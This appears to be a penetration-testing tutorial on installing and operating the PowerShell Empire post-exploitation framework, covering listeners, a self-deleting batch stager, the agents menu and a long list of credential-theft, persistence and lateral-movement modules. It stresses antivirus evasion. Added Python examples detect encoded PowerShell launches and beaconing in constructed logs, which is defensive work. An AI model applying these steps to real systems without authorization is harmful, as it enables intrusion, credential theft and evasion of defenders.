PowerShell Empire is a post-exploitation framework for computers running Microsoft Windows or Windows Server. In this series, we will cover everything from installing PowerShell Empire to looking around a target's computer without the antivirus software noticing. With some luck, we might even obtain domain administrator credentials and own the whole network.
Exploit frameworks are popular, and most hackers have heard of Metasploit, a framework that automates the deployment of powerful exploits. So how does PowerShell Empire differ from Metasploit? Doesn't Metasploit already serve the same purpose? Yes and no. PowerShell Empire deals strictly with Windows machines, which is an advantage in a penetration test because most targets these days are running some version of Windows.
A simple example: Microsoft Excel is used everywhere on Windows. Since the Windows version of Excel has more advanced features than the Mac version (and Office 365), we can assume that the finance department of most target companies runs Microsoft Windows. Finance departments also usually have access to bank account numbers and other juicy data!
PowerShell Empire also lets the attacker run commands in memory: the malicious actions PowerShell Empire takes are never written to the hard drive but execute in the computer's memory, which reduces the likelihood of being caught by antivirus software as well as the digital fingerprints left behind for forensic investigators.
Some of the activities and goals that can be accomplished include privilege escalation (elevating privileges from a standard user account to an administrator), network and host reconnaissance (finding out what hosts and services are present), lateral movement between hosts, and the gathering of credentials. All of these are vital components of a modern-day penetration test.
PowerShell Empire accomplishes this via three main components: listeners, stagers, and agents.
- A listener is a process that listens for a connection from the machine we are attacking. It helps Empire send the loot back to the attacker's computer.
- A stager is a snippet of code that allows our malicious code to be run via the agent on the compromised host.
- An agent is a program that maintains a connection between your computer and the compromised host.
Lastly, modules are where the fun is. These are what execute our malicious commands, which can harvest credentials and escalate our privileges, as mentioned above.
Now that we have discussed what PowerShell Empire does and why it is useful, let's take a look at how to get it up and running.
To run PowerShell Empire, you will need a Kali Linux machine. If you need a good starter Kali computer for hacking, you can check out our guide on setting one up on the low-cost Raspberry Pi.
To install Empire on your Kali Linux machine, we need to clone it from GitHub. Open a terminal and type the following command, as shown below.
~# git clone https://github.com/EmpireProject/Empire.git
Cloning into 'Empire'...
remote: Enumerating objects: 12216, done.
remote: Total 12216 (delta 0), reused 0 (delta 0), pack-reused 12216
Receiving objects: 100% (12216/12216), 22.14 MiB | 9.67 MiB/s, done.
Resolving deltas: 100% (8307/8307), done.
~# cd Empire
~/Empire# ls
changelog  data  Dockerfile  empire  lib  LICENSE  plugins  README.md  setup  VERSION
You can read about Empire in the README.md file.
~/Empire# leafpad README.md

# Empire

## This project is no longer supported

Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire premiered at [BSidesLV in 2015](https://www.youtube.com/watch?v=Pq9t59w0mUI) and Python EmPyre premiered at HackMiami 2016.

Empire relies heavily on the work from several other projects for its underlying functionality. We have tried to call out a few of those people we've interacted with [heavily here](http://www.powershellempire.com/?page_id=2) and have included author/reference link information in the source of each Empire module as appropriate. If we have failed to improperly cite existing or prior work, please let us know.

Empire is developed by [@harmj0y](https://twitter.com/harmj0y), [@sixdub](https://twitter.com/sixdub), [@enigma0x3](https://twitter.com/enigma0x3), [rvrsh3ll](https://twitter.com/424f424f), [@killswitch_gui](https://twitter.com/killswitch_gui), and [@xorrior](https://twitter.com/xorrior).

Feel free to join us on Slack! https://bloodhoundgang.herokuapp.com

## Install

To install, run `sudo ./setup/install.sh` script or use the corresponding docker image `docker pull empireproject/empire`. There's also a [quickstart here](http://www.powershellempire.com/?page_id=110) and full [documentation here](http://www.powershellempire.com/?page_id=83).

## Quickstart

Check out the [Empire wiki](https://github.com/EmpireProject/Empire/wiki/Quickstart) for instructions on getting started with Empire.

## Contribution Rules

Contributions are more than welcome! The more people who contribute to the project the better Empire will be for everyone. Below are a few guidelines for submitting contributions.

* Beginning with version 2.4, we will only troubleshoot issues for Kali, Debian, or Ubuntu. All other operating systems will not be supported. We understand that this is frustrating but hopefully the new docker build can provide an alternative.
* Submit pull requests to the [dev branch](https://github.com/powershellempire/Empire/tree/dev). After testing, changes will be merged to master.
* Depending on what you're working on, base your module on [./lib/modules/powershell_template.py](lib/modules/powershell_template.py) or [./lib/modules/python_template.py](lib/modules/python_template.py). **Note** that for some modules you may need to massage the output to get it into a nicely displayable text format [with Out-String](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L111).
* Cite previous work in the **'Comments'** module section.
* If your script.ps1 logic is large, may be reused by multiple modules, or is updated often, consider implementing the logic in the appropriate **data/module_source/*** directory and [pulling the script contents into the module on tasking](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L85-L95).
* Use [approved PowerShell verbs](https://technet.microsoft.com/en-us/library/ms714428(v=vs.85).aspx) for any functions.
* PowerShell Version 2 compatibility is **STRONGLY** preferred.
* TEST YOUR MODULE! Be sure to run it from an Empire agent before submitting a pull to ensure everything is working correctly.
* For additional guidelines for your PowerShell code itself, check out the [PowerSploit style guide](https://github.com/PowerShellMafia/PowerSploit/blob/master/README.md).
You will see a "setup" folder inside the Empire directory. Navigate to that folder by typing cd setup, then use the ls command to view the contents of the "setup" folder. You can see an install shell script, as shown below.
~/Empire# cd setup
~/Empire/setup# ls
cert.sh  install.sh  requirements.txt  reset.sh  setup_database.py
Type ./install.sh to install Empire by running the script. During the installation process, you will be asked to set up a server negotiation password. I set it as "toor" but you can choose your own password. If everything went well, the installation will finish, as shown below.
~/Empire/setup# ./install.sh
Reading package lists... Done
Building dependency tree
Reading state information... Done
default-jdk is already the newest version (2:1.11-72).
make is already the newest version (4.2.1-1.2).
make set to manually installed.
python-dev is already the newest version (2.7.17-2).
python-pip is already the newest version (18.1-5).
The following packages were automatically installed and are no longer required:
...
[>] Enter server negotiation password, enter for random generation: toor
[*] Database setup completed!
[*] Certificate written to ../data/empire-chain.pem
[*] Private key written to ../data/empire-priv.key
[*] Setup complete!
We are done with the installation. Now, it's time to start Empire.
Move back to the Empire directory by typing cd .. and run the ./empire executable as shown. It will start as seen below.
~/Empire/setup# cd ..
~/Empire# ./empire
[*] Loading stagers from: /root/Empire//lib/stagers/
[*] Loading modules from: /root/Empire//lib/modules/
[*] Loading listeners from: /root/Empire//lib/listeners/
If Empire displays an error while starting, navigate to the "setup" folder with cd setup and run the ./reset.sh script. Then, restart Empire again as we did before. If that still doesn't work, you may need to install some missing modules. Here are the ones I had to install:
~/Empire# python -m pip install iptools netifaces pydispatch pydispatcher zlib_wrapper macholib xlrd xlutils pyminifier dropbox
After you start Empire, it will display a welcome message as shown below.
~/Empire# ./empire
[*] Loading stagers from: /root/Empire//lib/stagers/
[*] Loading modules from: /root/Empire//lib/modules/
[*] Loading listeners from: /root/Empire//lib/listeners/
[*] Starting listener 'meterp'
[+] Listener successfully started!
[*] Starting listener 'http'
 * Serving Flask app "http" (lazy loading)
 * Environment: production
   WARNING: Do not use the development server in a production environment.
   Use a production WSGI server instead.
 * Debug mode: off
[+] Listener successfully started!
[*] Empire starting up...

[Empire ASCII-art emblem]

                Welcome to the Empire
Upon completion, Empire will show the following screen.
================================================================
[Empire]  Post-Exploitation Framework
================================================================
[Version] 2.5 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_) | |  | |  |_) |    |  |__
  |   __|  |  |\/|  | |   ___/ |  | |      /     |   __|
  |  |____ |  |  |  | |  |     |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|     |__| | _| `._____||_______|

       285 modules currently loaded
       0 listeners currently active
       0 agents currently active

(Empire) >
As of this writing, Empire has 285 modules. Don't worry if these sound like complicated ninjutsu techniques; with diligence and practice, you will learn what modules, listeners, and agents are. By the end of this series, you will have a clear idea of what they are and how to use them.
First, let's start by typing the help command, which will display the help menu, as seen below.
(Empire) > help

Commands
========
agents          Jump to the Agents menu.
creds           Add/display credentials to/from the database.
exit            Exit Empire
help            Displays the help menu.
interact        Interact with a particular agent.
list            Lists active agents or listeners.
listeners       Interact with active listeners.
load            Loads Empire modules from a non-standard folder.
plugin          Load a plugin file to extend Empire.
plugins         List all available and active plugins.
preobfuscate    Preobfuscate PowerShell module_source files
reload          Reload one (or all) Empire modules.
report          Produce report CSV and log files: sessions.csv, credentials.csv, master.log
reset           Reset a global option (e.g. IP whitelists).
resource        Read and execute a list of Empire commands from a file.
searchmodule    Search Empire module names/descriptions.
set             Set a global option (e.g. IP whitelists).
show            Show a global option (e.g. IP whitelists).
usemodule       Use an Empire module.
usestager       Use an Empire stager.
Listeners in Empire are the channels that receive connections from our target machine. Before we do anything in Empire, we need to start the listeners. We can move to the listener management menu by typing the listeners command, as shown below.
(Empire) > listeners
[!] No listeners currently active

(Empire: listeners) > help

Listener Commands
=================
agents          Jump to the agents menu.
back            Go back to the main menu.
creds           Display/return credentials from the database.
delete          Delete listener(s) from the database
disable         Disables (stops) one or all listeners. The listener(s) will not start automatically with Empire
edit            Change a listener option, will not take effect until the listener is restarted
enable          Enables and starts one or all listners.
exit            Exit Empire.
help            Displays the help menu.
info            Display information for the given active listener.
kill            Kill one or all active listeners.
launcher        Generate an initial launcher for a listener.
list            List all active listeners (or agents).
listeners       Jump to the listeners menu.
main            Go back to the main menu.
resource        Read and execute a list of Empire commands from a file.
uselistener     Use an Empire listener module.
usestager       Use an Empire stager.
Once we are in the listener management menu, as shown above, we can see its sub-menu by typing the help command. Let's take a look at what each command does.
- agents – Will take you to the agents menu.
- back & main – Will take you back to the main menu.
- exit – Will exit Empire.
- help – Will display the help menu shown above.
- info – Will display information about the active listener.
- kill – Will kill a particular listener.
- launcher – Used to generate an initial launcher for a listener.
- list – Will list all the active listeners.
- usestager – Used to load a stager (we will see below what exactly a stager is).
- uselistener – Used to start a listener module.
Let us now look at how to start a listener module in Empire. Type the uselistener command, and use tab-completion to see the listeners available in Empire. (If tab-completion isn't working, try enabling the feature with apt install bash-completion.)
(Empire: listeners) > uselistener
dbx           http          http_com      http_foreign  http_hop      meterpreter
The types of listeners available are shown above. We will learn about the different types of listeners in the upcoming sections. For now, let's see how to start a listener.
Let's use the "meterpreter" listener as an example. Type uselistener meterpreter as shown below. Once the listener is loaded, type the help command to display the available options.
The agents, back, exit, help, launcher, listeners, and main commands have been explained above. Let us learn about the other commands.
(Empire: listeners) > uselistener meterpreter
(Empire: listeners/meterpreter) > help

Listener Commands
=================
agents          Jump to the agents menu.
back            Go back a menu.
creds           Display/return credentials from the database.
execute         Execute the given listener module.
exit            Exit Empire.
help            Displays the help menu.
info            Display listener module options.
launcher        Generate an initial launcher for this listener.
listeners       Jump to the listeners menu.
main            Go back to the main menu.
resource        Read and execute a list of Empire commands from a file.
set             Set a listener option.
unset           Unset a listener option.

(Empire: listeners/meterpreter) >
The info command shows the information about the particular type of listener we want to start, as seen below.
(Empire: listeners/meterpreter) > info

    Name: Meterpreter
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a 'foreign' http[s] Meterpreter listener.

Meterpreter Options:

  Name   Required  Value                      Description
  ----   --------  -------                    -----------
  Host   True      http://192.168.91.138:80   Hostname/IP for staging.
  Name   True      meterpreter                Name for the listener.
  Port   True      80                         Port for the listener.

(Empire: listeners/meterpreter) >
Every listener requires certain options to be set. For example, the "meterpreter" listener needs the Host and Port values to be configured. The set command is used to assign these values. Similarly, the unset command is used to clear these values.
One important thing to remember is that Empire is case sensitive. For example, in the output below, I am setting the "Name" value of our listener. "Name" and "name" are not interchangeable, and Empire returns an error when the wrong one is used.
(Empire: listeners/meterpreter) > set
[!] Error in setting listener option: list index out of range
(Empire: listeners/meterpreter) > set name meterp
[!] Invalid option specified.
(Empire: listeners/meterpreter) > set Name meterp
(Empire: listeners/meterpreter) >
When all options are set, we can start a listener using the execute command.
(Empire: listeners/meterpreter) > execute
[*] Starting listener 'meterp'
[+] Listener successfully started!
(Empire: listeners/meterpreter) >
Once we go back to the main menu, we can see that our listener is currently active.
================================================================
[Empire]  Post-Exploitation Framework
================================================================
[Version] 2.5 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_) | |  | |  |_) |    |  |__
  |   __|  |  |\/|  | |   ___/ |  | |      /     |   __|
  |  |____ |  |  |  | |  |     |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|     |__| | _| `._____||_______|

       285 modules currently loaded
       1 listeners currently active
       0 agents currently active

(Empire) >
Stagers in Empire set the stage for the post-exploitation activities. They are similar to payloads: they create the connection back to Empire. Stagers are accessed with the usestager command, as shown below.
Type usestager and then use tab completion to see all the available stagers.
(Empire) > usestager
multi/bash            osx/macho                 windows/launcher_bat
multi/launcher        osx/macro                 windows/launcher_lnk
multi/macro           osx/pkg                   windows/launcher_sct
multi/pyinstaller     osx/safari_launcher       windows/launcher_vbs
multi/war             osx/teensy                windows/launcher_xml
osx/applescript       windows/backdoorLnkMacro  windows/macro
osx/application       windows/bunny             windows/macroless_msword
osx/ducky             windows/csharp_exe        windows/shellcode
osx/dylib             windows/dll               windows/teensy
osx/jar               windows/ducky
osx/launcher          windows/hta
(Empire) > usestager
We will learn about different stagers in an upcoming section. First, let's take a look at how to set up a stager.
Let's start the "launcher_bat" stager as an example.
Type the usestager windows/launcher_bat command to load the stager. Then, type the help command to have a look at the stager menu.
(Empire) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > help

Stager Menu
===========
agents          Jump to the agents menu.
back            Go back a menu.
creds           Display/return credentials from the database.
execute         Generate/execute the given Empire stager.
exit            Exit Empire.
generate        Generate/execute the given Empire stager.
help            Displays the help menu.
info            Display stager options.
interact        Interact with a particular agent.
list            Lists all active agents (or listeners).
listeners       Jump to the listeners menu.
main            Go back to the main menu.
options         Display stager options.
resource        Read and execute a list of Empire commands from a file.
set             Set a stager option.
unset           Unset a stager option.

(Empire: stager/windows/launcher_bat) >
- agents – Will take you directly to the agents menu.
- back & main – Will take you back to the main menu.
- exit – Will exit Empire.
- help – Will display the help menu shown above.
- info – Will display the options of the loaded stager.
- kill – Is used to kill a particular listener.
- execute or generate – Will generate the stager.
- interact – Is used to interact with a particular agent (normally used when there are multiple listeners).
- list – Will list all the active listeners or agents.
- options – Will display all the options we need to set for this stager.
- set and unset – Used to set and unset values of particular options, respectively.
- listeners – Used to jump to the listeners menu.
We can get more information about this particular stager by using the info command. As the info output shows, it generates a self-deleting batch file.
(Empire: stager/windows/launcher_bat) > info

Name: BAT Launcher

Description:
  Generates a self-deleting .bat launcher for Empire.

Options:

  Name              Required  Value                                Description
  ----              --------  -------                              -----------
  Listener          True                                           Listener to generate stager for.
  OutFile           False     /tmp/launcher.bat                    File to output .bat launcher to, otherwise displayed on the screen.
  Obfuscate         False     False                                Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.
  ObfuscateCommand  False     Token\All\1,Launcher\STDIN++\12467   The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.
  Language          True      powershell                           Language of the stager to generate.
  ProxyCreds        False     default                              Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  UserAgent         False     default                              User-agent string to use for the staging request (default, none, or other).
  Proxy             False     default                              Proxy to use for request (default, none, or other).
  Delete            False     True                                 Switch. Delete .bat after running.
  StagerRetries     False     0                                    Times for the stager to retry connecting.

(Empire: stager/windows/launcher_bat) >
We need to set a listener so the stager can communicate with Empire. In the last step, we already created a listener; let us assign it to our "launcher_bat" stager with the set Listener command, then type execute to generate the stager.
(Empire: stager/windows/launcher_bat) > set Listener meterpreter
(Empire: stager/windows/launcher_bat) > execute
[*] Stager output written out to: /tmp/launcher.bat
(Empire: stager/windows/launcher_bat) >
The stager is written to /tmp/launcher.bat, as the output above shows.
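The launcher generated above is a batch file that starts PowerShell and keeps the payload in memory, which is the in-memory execution property discussed at the start of this tutorial. From the defender's side, those same properties are what process-creation telemetry records: a powershell.exe child of cmd.exe, a hidden window, and a base64 -EncodedCommand. The following Python is an added example, not part of this tutorial or of the Empire project, that parses constructed process-creation events in a simple key=value form, flags that combination, and decodes the UTF-16LE base64 so an analyst can read the script. The event format, the file paths, and the sample script are assumptions made for the example.

```python
import base64
import re

# Field layout of the constructed events below (assumed; the fields mirror what an EDR
# or Sysmon process-creation event carries, but this is not a real log format).
EVENT_RE = re.compile(r"^ParentImage=(.*?) Image=(.*?) CommandLine=(.*)$")

# Common spellings of PowerShell's -EncodedCommand switch, followed by the base64 blob.
ENCODED_RE = re.compile(r"-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# -WindowStyle Hidden, also written as -W Hidden or -W 1.
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """-EncodedCommand takes base64 of the script as UTF-16LE text.
    Used here only to build the constructed sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64 / not UTF-16LE: leave it for manual review


def parse_event(line: str):
    m = EVENT_RE.match(line)
    if not m:
        return None
    return {"parent": m.group(1), "image": m.group(2), "cmdline": m.group(3)}


def analyze(events):
    """Flag powershell.exe launches that look like an in-memory launcher: an encoded
    command, or a hidden window combined with a cmd.exe (batch file) parent."""
    findings = []
    for line in events:
        ev = parse_event(line)
        if ev is None or not ev["image"].lower().endswith("powershell.exe"):
            continue
        reasons = []
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is not None:
            reasons.append("encoded command")
        if HIDDEN_RE.search(ev["cmdline"]):
            reasons.append("hidden window")
        if ev["parent"].lower().endswith("cmd.exe"):
            reasons.append("spawned from cmd.exe (batch launcher)")
        if decoded is not None or len(reasons) >= 2:
            findings.append({"cmdline": ev["cmdline"], "reasons": reasons, "decoded": decoded})
    return findings


# Constructed sample events; a benign script stands in for whatever a launcher would carry.
SAMPLE_SCRIPT = "Write-Host 'constructed sample script'"
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\notepad.exe "
    "CommandLine=notepad.exe report.txt",
    "ParentImage=C:\\Windows\\System32\\cmd.exe "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell -NoP -sta -W Hidden -Enc " + encode_powershell(SAMPLE_SCRIPT),
    "ParentImage=C:\\Windows\\System32\\cmd.exe "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell -NoProfile -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(", ".join(finding["reasons"]))
        print("  decoded:", finding["decoded"])
```

The third sample event (an administrator's scheduled script started from a batch file) is deliberately not flagged: a cmd.exe parent on its own is routine, so the rule needs either an encoded command or two independent indicators. In practice the decoded script is what goes into the ticket, because the base64 on its own tells the analyst nothing.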
When the stager is delivered to the target system and runs there, it opens a reverse connection back to our listener. That connection is known as an agent.
The Agents menu can be accessed with the agents command, as shown below. As the output states, we do not currently have any agents registered, but that is just around the corner.
(Empire) > agents
[!] No agents currently registered

(Empire: agents) > help

Commands
========
agents          Jump to the agents menu.
autorun         Read and execute a list of Empire commands from a file and execute on each new agent "autorun <resource file> <agent language>" e.g. "autorun /root/ps.rc powershell". Or clear any autorun setting with "autorun clear" and show current autorun settings with "autorun show"
back            Go back to the main menu.
clear           Clear one or more agent's taskings.
creds           Display/return credentials from the database.
exit            Exit Empire.
help            Displays the help menu.
interact        Interact with a particular agent.
kill            Task one or more agents to exit.
killdate        Set the killdate for one or more agents (killdate [agent/all] 01/01/2016).
list            Lists all active agents (or listeners).
listeners       Jump to the listeners menu.
lostlimit       Task one or more agents to 'lostlimit [agent/all] [number of missed callbacks] '
main            Go back to the main menu.
remove          Remove one or more agents from the database.
rename          Rename a particular agent.
resource        Read and execute a list of Empire commands from a file.
searchmodule    Search Empire module names/descriptions.
sleep           Task one or more agents to 'sleep [agent/all] interval [jitter]'
usemodule       Use an Empire PowerShell module.
usestager       Use an Empire stager.
workinghours    Set the workinghours for one or more agents (workinghours [agent/all] 9:00-17:00).

(Empire: agents) >
The help output above lists all the commands available once an agent has established a connection with Empire. For example, the list command shows all the active agents we have, as seen below.
(Empire: agents) > list

[*] Active agents:

 Name      Lang  Internal IP     Machine Name   Username  Process          Delay  Last Seen
 --------  ----  --------------  -------------  --------  -------          -----  -------------------
 7A9WSDPN  ps    XXXXXXXXXXXXXX  XXXXXXXXXXXXX  XXXXXXXX  powershell/4032  5/0.0  2020-03-29 09:00:44
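The Delay column above reads 5/0.0: this agent checks in every 5 seconds with no jitter, and the sleep command in the agents menu (sleep [agent/all] interval [jitter]) changes both values. For a defender, that regularity is the signal to look for. The Python below is an added example, not part of this tutorial or of the Empire project, that groups a constructed web-access log by source host, computes the gaps between successive requests to the listener, and flags hosts whose gaps are both numerous and nearly uniform (a low coefficient of variation). The log records, the internal host addresses and the thresholds are assumptions; the destination reuses the listener address shown in the info output earlier on the page, and the jittered series is simply a hand-picked set of gaps around 5 seconds rather than a claim about how Empire computes jitter.

```python
import statistics
from datetime import datetime, timedelta

# Staging host from the meterpreter listener's info output on this page.
LISTENER = "http://192.168.91.138:80/"


def constructed_log():
    """Constructed access log as (timestamp, source, destination) tuples; not real data.
    10.0.0.23 mimics an agent at Delay 5/0.0; 10.0.0.31 mimics a jittered 5-second sleep
    (hand-picked gaps between 4.1 s and 5.9 s); 10.0.0.40 is a person clicking around."""
    base = datetime(2020, 3, 29, 9, 0, 44)
    log = []
    for i in range(12):
        log.append((base + timedelta(seconds=5 * i), "10.0.0.23", LISTENER))
    t = base
    log.append((t, "10.0.0.31", LISTENER))
    for gap in [4.2, 5.8, 4.6, 5.3, 5.9, 4.1, 5.0, 4.8, 5.5, 4.4, 5.7]:
        t += timedelta(seconds=gap)
        log.append((t, "10.0.0.31", LISTENER))
    for gap in [0, 3, 17, 21, 62, 63, 140, 200, 206, 330]:
        log.append((base + timedelta(seconds=gap), "10.0.0.40", LISTENER))
    return log


def intervals_by_source(log, destination):
    """Seconds between successive requests from each source to the destination."""
    by_src = {}
    for ts, src, dst in log:
        if dst == destination:
            by_src.setdefault(src, []).append(ts)
    result = {}
    for src, times in by_src.items():
        times.sort()
        result[src] = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    return result


def beacon_score(gaps):
    """Coefficient of variation of the gaps: 0.0 for a perfectly regular beacon,
    around 1 or more for human-driven traffic. None if there are too few samples."""
    if len(gaps) < 2:
        return None
    mean = statistics.mean(gaps)
    if mean == 0:
        return None
    return statistics.pstdev(gaps) / mean


def suspected_beacons(log, destination, min_gaps=8, max_cv=0.2):
    """Sources with at least min_gaps callbacks whose timing is regular enough to
    look machine-driven. Returns (source, mean gap, cv) tuples, sorted by source."""
    flagged = []
    for src, gaps in intervals_by_source(log, destination).items():
        cv = beacon_score(gaps)
        if len(gaps) >= min_gaps and cv is not None and cv <= max_cv:
            flagged.append((src, round(statistics.mean(gaps), 1), round(cv, 3)))
    return sorted(flagged)


if __name__ == "__main__":
    for src, mean_gap, cv in suspected_beacons(constructed_log(), LISTENER):
        print(f"{src}: ~{mean_gap}s between callbacks, cv={cv}")
```

Raising the jitter spreads the gaps and raises the coefficient of variation, which is exactly why operators set it; the sample count threshold (min_gaps) is what keeps a handful of coincidentally regular page loads from firing. A longer workinghours-style window, where the agent simply goes quiet, shows up as a gap in the series rather than as a change in the score, so the two views complement each other.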
Modules in Empire are used to perform specific functions. We can access modules using the usemodule command. Type usemodule followed by a space, then use tab completion to see all the modules.
(Empire: agents) > usemodule Display all 285 possibilities? (y or n) y exfiltration/Invoke_ExfilDataToGitHub external/generate_agent powershell/code_execution/invoke_dllinjection powershell/code_execution/invoke_metasploitpayload powershell/code_execution/invoke_ntsd powershell/code_execution/invoke_reflectivepeinjection powershell/code_execution/invoke_shellcode powershell/code_execution/invoke_shellcodemsil powershell/collection/ChromeDump powershell/collection/FoxDump powershell/collection/USBKeylogger* powershell/collection/WebcamRecorder powershell/collection/browser_data powershell/collection/clipboard_monitor powershell/collection/file_finder powershell/collection/find_interesting_file powershell/collection/get_indexed_item powershell/collection/get_sql_column_sample_data powershell/collection/get_sql_query powershell/collection/inveigh powershell/collection/keylogger powershell/collection/minidump powershell/collection/netripper powershell/collection/ninjacopy* powershell/collection/packet_capture* powershell/collection/prompt powershell/collection/screenshot powershell/collection/vaults/add_keepass_config_trigger powershell/collection/vaults/find_keepass_config powershell/collection/vaults/get_keepass_config_trigger powershell/collection/vaults/keethief powershell/collection/vaults/remove_keepass_config_trigger powershell/credentials/credential_injection* powershell/credentials/enum_cred_store powershell/credentials/invoke_kerberoast powershell/credentials/mimikatz/cache* powershell/credentials/mimikatz/certs* powershell/credentials/mimikatz/command* powershell/credentials/mimikatz/dcsync powershell/credentials/mimikatz/dcsync_hashdump powershell/credentials/mimikatz/extract_tickets powershell/credentials/mimikatz/golden_ticket powershell/credentials/mimikatz/keys* powershell/credentials/mimikatz/logonpasswords* powershell/credentials/mimikatz/lsadump* powershell/credentials/mimikatz/mimitokens* powershell/credentials/mimikatz/pth* 
powershell/credentials/mimikatz/purge powershell/credentials/mimikatz/sam* powershell/credentials/mimikatz/silver_ticket powershell/credentials/mimikatz/trust_keys* powershell/credentials/powerdump* powershell/credentials/sessiongopher powershell/credentials/tokens powershell/credentials/vault_credential* powershell/exfiltration/egresscheck powershell/exfiltration/exfil_dropbox powershell/exploitation/exploit_eternalblue powershell/exploitation/exploit_jboss powershell/exploitation/exploit_jenkins powershell/lateral_movement/inveigh_relay powershell/lateral_movement/invoke_dcom powershell/lateral_movement/invoke_executemsbuild powershell/lateral_movement/invoke_psexec powershell/lateral_movement/invoke_psremoting powershell/lateral_movement/invoke_smbexec powershell/lateral_movement/invoke_sqloscmd powershell/lateral_movement/invoke_sshcommand powershell/lateral_movement/invoke_wmi powershell/lateral_movement/invoke_wmi_debugger powershell/lateral_movement/jenkins_script_console powershell/lateral_movement/new_gpo_immediate_task powershell/management/disable_rdp* powershell/management/downgrade_account powershell/management/enable_multi_rdp* powershell/management/enable_rdp* powershell/management/get_domain_sid powershell/management/honeyhash* powershell/management/invoke_script powershell/management/lock powershell/management/logoff powershell/management/mailraider/disable_security powershell/management/mailraider/get_emailitems powershell/management/mailraider/get_subfolders powershell/management/mailraider/mail_search powershell/management/mailraider/search_gal powershell/management/mailraider/send_mail powershell/management/mailraider/view_email powershell/management/psinject powershell/management/reflective_inject powershell/management/restart powershell/management/runas powershell/management/shinject powershell/management/sid_to_user powershell/management/spawn powershell/management/spawnas powershell/management/switch_listener powershell/management/timestomp 
powershell/management/user_to_sid powershell/management/vnc powershell/management/wdigest_downgrade* powershell/management/zipfolder powershell/persistence/elevated/registry* powershell/persistence/elevated/schtasks* powershell/persistence/elevated/wmi* powershell/persistence/elevated/wmi_updater* powershell/persistence/misc/add_netuser powershell/persistence/misc/add_sid_history* powershell/persistence/misc/debugger* powershell/persistence/misc/disable_machine_acct_change* powershell/persistence/misc/get_ssps powershell/persistence/misc/install_ssp* powershell/persistence/misc/memssp* powershell/persistence/misc/skeleton_key* powershell/persistence/powerbreach/deaduser powershell/persistence/powerbreach/eventlog* powershell/persistence/powerbreach/resolver powershell/persistence/userland/backdoor_lnk powershell/persistence/userland/registry powershell/persistence/userland/schtasks powershell/privesc/ask powershell/privesc/bypassuac powershell/privesc/bypassuac_env powershell/privesc/bypassuac_eventvwr powershell/privesc/bypassuac_fodhelper powershell/privesc/bypassuac_sdctlbypass powershell/privesc/bypassuac_tokenmanipulation powershell/privesc/bypassuac_wscript powershell/privesc/getsystem* powershell/privesc/gpp powershell/privesc/mcafee_sitelist powershell/privesc/ms16-032 powershell/privesc/ms16-135 powershell/privesc/powerup/allchecks powershell/privesc/powerup/find_dllhijack powershell/privesc/powerup/service_exe_restore powershell/privesc/powerup/service_exe_stager powershell/privesc/powerup/service_exe_useradd powershell/privesc/powerup/service_stager powershell/privesc/powerup/service_useradd powershell/privesc/powerup/write_dllhijacker powershell/privesc/tater powershell/recon/find_fruit powershell/recon/get_sql_server_login_default_pw powershell/recon/http_login powershell/situational_awareness/host/antivirusproduct powershell/situational_awareness/host/computerdetails* powershell/situational_awareness/host/dnsserver 
powershell/situational_awareness/host/findtrusteddocuments powershell/situational_awareness/host/get_pathacl powershell/situational_awareness/host/get_proxy powershell/situational_awareness/host/get_uaclevel powershell/situational_awareness/host/monitortcpconnections powershell/situational_awareness/host/paranoia* powershell/situational_awareness/host/winenum powershell/situational_awareness/network/arpscan powershell/situational_awareness/network/bloodhound powershell/situational_awareness/network/get_exploitable_system powershell/situational_awareness/network/get_spn powershell/situational_awareness/network/get_sql_instance_domain powershell/situational_awareness/network/get_sql_server_info powershell/situational_awareness/network/portscan powershell/situational_awareness/network/powerview/find_foreign_group powershell/situational_awareness/network/powerview/find_foreign_user powershell/situational_awareness/network/powerview/find_gpo_computer_admin powershell/situational_awareness/network/powerview/find_gpo_location powershell/situational_awareness/network/powerview/find_localadmin_access powershell/situational_awareness/network/powerview/find_managed_security_group powershell/situational_awareness/network/powerview/get_cached_rdpconnection powershell/situational_awareness/network/powerview/get_computer 